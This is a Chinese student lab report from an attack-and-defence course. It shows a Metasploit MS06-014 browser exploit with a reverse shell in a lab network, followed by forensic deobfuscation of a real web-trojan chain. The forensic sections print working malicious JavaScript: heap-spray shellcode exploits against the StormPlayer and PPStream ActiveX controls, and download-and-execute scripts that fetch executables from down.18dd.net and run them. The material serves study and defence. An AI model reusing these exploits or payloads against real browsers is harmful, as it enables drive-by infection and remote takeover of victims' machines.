20251918 2024-2025-2 《网络攻防实践》实践十一报告

1.实践内容

1.1 实践内容

1.1.1 浏览器渗透攻击(MS06-014)

MS06-014是Internet Explorer中createObject方法的远程代码执行漏洞,攻击者可通过构造恶意网页触发该漏洞,从而获取目标系统的控制权。在Metasploit中选用exploit/windows/browser/ie_createobject模块,配置generic/shell_reverse_tcp等反向TCP载荷并启动攻击,会生成一个恶意URL。当靶机使用存在漏洞的IE浏览器访问该链接时,漏洞被触发,攻击机即可获得反向Shell,实现对靶机的远程命令执行与完全控制。

1.1.2 网页木马的跳转链结构

真实网页木马攻击并非由单一文件构成,而是采用多层跳转与动态解密相结合的链式结构。入口文件(如start.html)往往只是攻击链条的“引子”,真正的恶意逻辑隐藏在后续脚本中。攻击者在每一层跳转中可能综合运用Base64编码、XXTEA加密、Packer混淆(如利用eval配合数组解密)、十六进制或八进制转义等多种手段对代码进行混淆,使安全分析人员难以直接识读和追踪恶意行为。

1.1.3 哈希值作为资源定位符

在此类攻击中,攻击者常利用MD5散列值作为资源定位符,将下一级恶意脚本或可执行文件以MD5值命名并存放于远端服务器。这种做法能够避免直接暴露文件的路径与实际用途,同时便于攻击者快速替换恶意内容而不必修改访问逻辑。在取证分析时,通常先从当前文件中提取URL或可疑字符串,计算其小写MD5散列值,再到固定的服务器路径下下载对应文件,进而逐层剥离混淆和加密,还原攻击全貌。

1.2学习内容

本次实践系统地学习了Web浏览器挂马渗透与逆向取证的相关知识。在浏览器漏洞原理方面,重点掌握了MS06-014漏洞,这是IE浏览器中msadco.dll组件RDS.Dataspace ActiveX控件的远程代码执行漏洞,旧版Windows XP配合IE6环境访问恶意页面即可触发,攻击者可借此完全控制受害系统;同时了解了网页挂马的基本机制,即恶意HTML内嵌漏洞利用代码,浏览器解析页面时触发内核或组件漏洞,进而落地恶意载荷;此外还学习了IE内核漏洞、JS引擎漏洞、ActiveX控件漏洞及第三方插件漏洞等浏览器漏洞分类。在Metasploit渗透框架方面,熟悉了Exploit漏洞利用模块与Payload恶意载荷的区别,掌握了LHOST(攻击机IP)与RHOST(靶机IP)的配置方法,理解了漏洞攻陷后Session远程控制会话的建立与管理,以及恶意网页的生成与部署流程。在Shell反弹通信原理方面,学习了反向Shell的工作机制,即受害主机主动发起TCP连接至攻击机监听端口,从而有效规避入站防火墙的拦截。在MD5哈希编码方面,掌握了MD5作为32位小写十六进制单向不可逆摘要算法的特性,以及攻击者利用MD5哈希值作为无扩展名文件名远程隐匿存储恶意样本的手法。在网页木马链式加载与脚本解密方面,深入分析了多级嵌套加载的跳转链结构,掌握了Base64编码、XXTEA加密、Packer混淆、十六进制与八进制转义等常见脚本混淆手段,并学习了从HTML和JavaScript中逆向还原原始代码、追踪后续文件下载地址的脚本解密方法。在二进制恶意程序逆向技术方面,了解了IDA Pro静态反汇编分析PE结构、汇编指令与导入表的方法,以及动态调试工具的用途。在攻防对抗方面,学习了多漏洞组合挂马的构造思路、代码混淆规避静态检测的原理、邮件钓鱼社会工程学攻击的常见手法,以及防守方从提取链接、解混淆还原源码到识别漏洞类型与受影响浏览器型号的分析流程。最后,在恶意代码取证流程方面,掌握了从入口文件逐层溯源解析、对网页脚本持续解密与对二进制程序开展逆向调试的分类分析规则,以及迭代解析所有嵌套文件直至完整还原样本链路的循环取证方法。

2.实践过程

2.1 实验准备

2.1.1.攻击机

系统:kali
IP地址:192.168.200.131
c1d94da2-1b16-43ff-95e3-218018f72ef2

2.1.2靶机

系统:Win2k
IP地址:192.168.200.132
98716b97-707b-4b31-9cf9-661872e3b0e6

2.2 web浏览器渗透攻击:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程

(1)首先利用命令 msfconsole 打开Metasploit。输入 search MS06-014,发现只有一个可用的攻击模块;输入 use 0,使用该模块进行攻击。
7b502016-e561-498c-98b8-65bc4a9c58f4
c0514a9a-1c11-40b9-87b4-860cd76f9e16
(2)输入指令:show payloads,查看可用的载荷,即编号4载荷;
facf27c8-1626-4845-95fe-07a643f8ee13
(3)输入指令:set payload generic/shell_reverse_tcp,选择攻击载荷进行反向tcp链接,主动攻击;
6dbda6ce-a822-4dca-bf86-9bea5df0fc93
(4)输入命令 set RHOST 192.168.200.132设置win2k虚拟机为靶机,输入命令set LHOST 192.168.200.131设置kali虚拟机为攻击机
a31dae81-6079-49fb-997f-024cceaae472
(5)输入exploit开始渗透攻击,得到网页木马链接为:http://192.168.200.131:8080/zcpPoxoN6hQ ,并使用靶机win2k上的浏览器打开此链接,发现只有一段字符串
36d26947-3efd-4476-8c2c-fcff6279b4ac
(6)回到攻击机kali,输入sessions查看连接,发现攻击机kali与靶机win2k已经成功建立终端连接
61ace382-8d26-4345-a0c3-c03c8edead58
(7)输入命令sessions -i 1取得靶机控制权打开会话,输入ipconfig显示出了靶机win2k的ip信息,说明攻击成功
a4c8957d-e5e6-4b28-a5b5-761c8b0d5d35

2.3取证分析实践—网页木马攻击场景分析

(1)用记事本打开 start.html,搜索关键字 new09.htm,
61ccc7b9-8b92-4c02-8aac-674122be34b0
(2)用记事本打开new09.htm文件,
发现页面底部存在隐藏 iframe:

点击查看代码 
<iframe src="new09.htm" width="0" height="0"></iframe>

710b08cf-78b0-4afe-a7e4-40664559e08f

(3)参考学习通教程《网页挂马分析实践参考(上)》,new09.htm 的相关代码如下:

点击查看代码 
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>
<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe>

(4)找一个MD5计算网址对new09.htm中的两个网址进行散列值计算https://www.tooldeer.com/hashcalculator-md5.html

3432a397-eb65-4b2a-ac73-536d2ee87bd3
c14cdfa2-dc87-4d0a-acd3-78dab9acde75

URL MD5 值
http://js.users.51.la/1299644.js 23180a42a2ff1192150231b44ffdf3d3
http://aa.18dd.net/aa/kl.htm 7f60672dcd6b5e90b6772545ee219bd3

(5)到学习通资料-实践十一-参考答案-网页挂马分析实践中下载压缩包复制到kali后解压,根据上述散列值查找文件并用记事本打开文件1,调整至gbk显示发现这不是一个木马,该文件可以停止解密了
50e03310-609c-4c6b-b56b-73a1edc44580
2d35e89a-3f2d-4705-97bf-3a1781d737b6
(2)打开文件2,分析可知是base64加密,密钥也被代码标明了
96b75343-52f9-4644-b504-16f63583886d

85602805-a59f-4d1a-8f1e-57073b417855
(3)加密文件密钥\x73\x63\x72\x69\x70\x74解密 https://lzltool.cn/Toolkit/ConvertStringToHexadecimal 可知是script
并使用 XXTEA 工具对文件进行解密
a73a86c0-68c5-4b12-83de-f70cac7d6e32
4b078a5a-7d83-4b1e-a5f8-dd72fb0b4ced
74663a5b-03a2-427b-bb6a-e27abb8a8b29
继续十六进制转化可得代码:

点击查看代码 
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

(4)通过分析文件我们可以看出文件里使用了“Adodb.Stream”(微软数据库访问对象)、“MPS.StormPlayer”(暴风影音)、POWERPLAYER.PowerPlayerCtrl.1”(PPStream)和“BaiduBar.Tool”(百度搜霸)外调函数漏洞。
分别对获取四个漏洞对应引用的四个文件的md5散列值:
1、 “ http://aa.18dd.net/aa/1.js ”------5d7e9058a857aa2abee820d5473c5fa4
2、 “ http://aa.18dd.net/aa/b.js ”------3870c28cc279d457746b3796a262f166
3、 “ http://aa.18dd.net/aa/pps.js ”------5f0b8bf0385314dbe0e5ec95e6abedc2
4、 “ http://down.18dd.net/bb/bd.cab ”------1c1d7b3539a617517c49eee4120783b2
(5)首先看文件2-1 5d7e9058a857aa2abee820d5473c5fa4
14d674c5-0dbd-422a-8a62-112b0a0f18bf
转换得代码
4c48d9ab-447c-460f-997b-48156405e772

点击查看代码 
var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
解密后发现该文件下载了 014.exe 文件。

(6)然后看文件 3870c28cc279d457746b3796a262f166
57f00a4b-98fc-4349-9842-f63f4c60430b

记事本中打开该文件,注意到"function(packed)"字眼。该文件使用了packed加密,利用在线工具进行解密后得到

点击查看代码 
var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
while(bigblock.length<slackspace)bigblock+=bigblock;
fillblock=bigblock.substring(0,slackspace);
block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace<0x40000)block=block+block+fillblock;
memory=new Array();
for(x=0;
x<300;
x++)memory[x]=block+shellcode;
var buffer='';
while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)

分析解密后的代码可以发现该文件利用下载器shellcode,下载了http://down.18dd.net/bb/bf.exe 文件。
(7)查看文件 5f0b8bf0385314dbe0e5ec95e6abedc2
可以看到,该文件使用的8进制变换。进行解密后可以得到
affe8d62-c3a6-4aad-bf4a-a5b4fb84e5ee

点击查看代码 
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

下载了http://down.18dd.net/bb/pps.exe 。
(8)打开文件 1c1d7b3539a617517c49eee4120783b2
可以发现该文件是一个压缩文件,进行解压后,电脑杀软会自动将其视为蠕虫病毒,直接删除,因此需要在虚拟机里进行解压。在虚拟机中解压后可以得到一个bd.exe文件。

6d9ca0cb-303a-48ab-9337-d12b97363472

(9)获取的四个文件的MD5值:
http://down.18dd.net/bb/014.exe ”------ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe ”------268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe ”------ff59b3b8961f502289c1b4df8c37e2a4
http://down.18dd.net/bb/bd.exe ”------994f7810e6a461292cc337bf73981e2c
计算散列值发现完全相同,所以这四个文件是完全一样的文件,因此随机找一个文件进行分析。
(10)使用WinXP自带的超级巡警脱壳工具进行脱壳再随后使用IDA工具对该文件进行分析,可以发现,该可执行文件下载了大量的木马可执行文件
IMG_20260608_143851
至此分析完毕

2.4攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

(1)测试连通性
107b366f-0be7-46ef-a037-6c094eeeac24

cc96478b-e911-411c-ae9f-d2d83f82342b

(2)在kali中使用命令msfconsole打开Metasploit
e1a1e2ea-9be6-4d3e-8ecb-1456eeb412fe

(3)命令search MS06-014 查询发现只有一个可用的攻击模块,use 0 使用该模块进行攻击
bc405adf-942a-4fbb-9ba5-1d416056b583
06d85ac3-7876-40c6-8e68-b78ac6e869b9
(4)使用 show payloads 查询可用载荷
6926e6fd-0ddc-4579-ae09-d2b7ce801dd1

(5)使用4号载荷,配置攻击参数set payload generic/shell_reverse_tcp、set RHOST 192.168.200.132(靶机)、set LHOST 192.168.200.131 (攻击机)
31625d71-5aca-4db8-ad99-1feae235cbb8

(6)使用命令 exploit 进行攻击,得到含有木马的网络链接
31625d71-5aca-4db8-ad99-1feae235cbb8

(7)用靶机访问这个网址

89d5dc1d-1684-46c0-bb5d-0238b59b6e34

(8)使用view-source:查看源码

2a3dced5-de30-4f64-af52-448bb9d090fa
去除空格后的代码如下

点击查看代码 
</details><html><head><title></title>
<scriptlanguage="javascript">
functionpVcQptuXtURkI(o,n)
{varr=null;
	try{eval("r=o"+".C"+"re"+"ate"+"Ob"+"je"+"ct(n)")}
	catch(e){}
	if(!r)
	{try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'')")}
	catch(e){}}if(!r)
	{try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'','')")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"je"+"ct('',n)")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n,'')")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n)")}catch(e){}}
	return(r);}
functionKICnWOyGLGaPMnBBSTFqivHOpkic(a)
{vars=pVcQptuXtURkI(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");
varo=pVcQptuXtURkI(a,"A"+"DO"+"D"+"B.S"+"tr"+"eam");
vare=s.Environment("P"+"ro"+"ce"+"ss");
varurl=document.location+'/p'+'ay'+'lo'+'ad';varxml=null;
varbin=e.Item("T"+"E"+"M"+"P")+"\\ujOvdPBAnxoLeaHiExeg"+".e"+"xe";
vardat;try{xml=newXMLHttpRequest();}
catch(e){try{xml=newActiveXObject("Microsoft.XMLHTTP");}catch(e){xml=newActiveXObject("MSXML2.ServerXMLHTTP");}}
if(!xml){return(0);}
xml.open("GET",url,false);
xml.send(null);
dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0);}
functionKgYOUdGGjoLHKdVQmjepXovpiiN()
{var i=0;
var t=newArray(
'{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}',
'{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}',
'{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}',
'{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}',
'{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}',
'{'+'0'+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}',
'{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}',
'{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}',
'{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}',
'{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}',
'{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}',
'{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',
'{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',null);
while(t[i])
{vara=null;
if(t[i].substring(0,1)=='{')
{a=document.createElement("object");
a.setAttribute("cl"+"as"+"sid","cl"+"s"+"id"+":"+t[i].substring(1,t[i].length-1));}
else{try{a=newActiveXObject(t[i]);}catch(e){}}
if(a)
{try{varb=pVcQptuXtURkI(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");if(b){KICnWOyGLGaPMnBBSTFqivHOpkic(a);return(0);}}
catch(e){}}i++;}}
</script></head><bodyonload='KgYOUdGGjoLHKdVQmjepXovpiiN()'>KlfoGjq</body></html>
其中还包括着一个可执行文件的相关操作:EONVFedsZYIKzToBkkd.exe经查询相关资料得上述这些信息正好是MS06-014漏洞的相关信息。

3.学习中遇到的问题及解决

  • 问题1:在取证分析阶段,用记事本打开下载的恶意脚本文件时出现乱码,无法正常阅读代码内容。
  • 问题1解决方案:将文件编码手动调整为 GBK,或换用浏览器打开后查看页面源代码,即可正常显示中文字符和脚本逻辑。
  • 问题2:对 bd.cab 压缩包解压时,本机杀毒软件自动将解压出的 bd.exe 识别为蠕虫病毒并直接删除,导致无法继续分析。
  • 问题2解决方案:在隔离的虚拟机环境中执行解压操作,或在确认安全的前提下临时关闭杀毒软件的实时防护功能,解压完成后尽快恢复防护。

4.实践总结

本次实践从攻击与防御两个维度,完整地体验了Web浏览器渗透攻击的全过程。在攻击端,通过Metasploit框架利用MS06-014漏洞成功构造恶意网页,使靶机访问后反弹Shell,直观理解了漏洞触发与远程控制的基本原理。在防御分析端,对真实网页木马场景进行了逐层取证,从入口文件入手,依次应对Base64编码、XXTEA加密、Packer混淆等多种脚本保护手段,掌握了利用MD5哈希值定位后续恶意文件的追踪方法,最终还原出完整的攻击链条与多个下载器木马。攻防对抗环节则进一步巩固了对漏洞组合利用、代码混淆投递及邮件钓鱼社会工程学手法的认识。整体实践表明,网页挂马攻击具有极强的隐蔽性与链式依赖特性,有效的检测与取证需要综合运用脚本逆向、哈希溯源和二进制分析等多种技术手段,在真实场景中具备重要的应用价值。

posted on 2026-06-10 16:12  jh163  阅读(2)  评论(0)    收藏  举报

博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3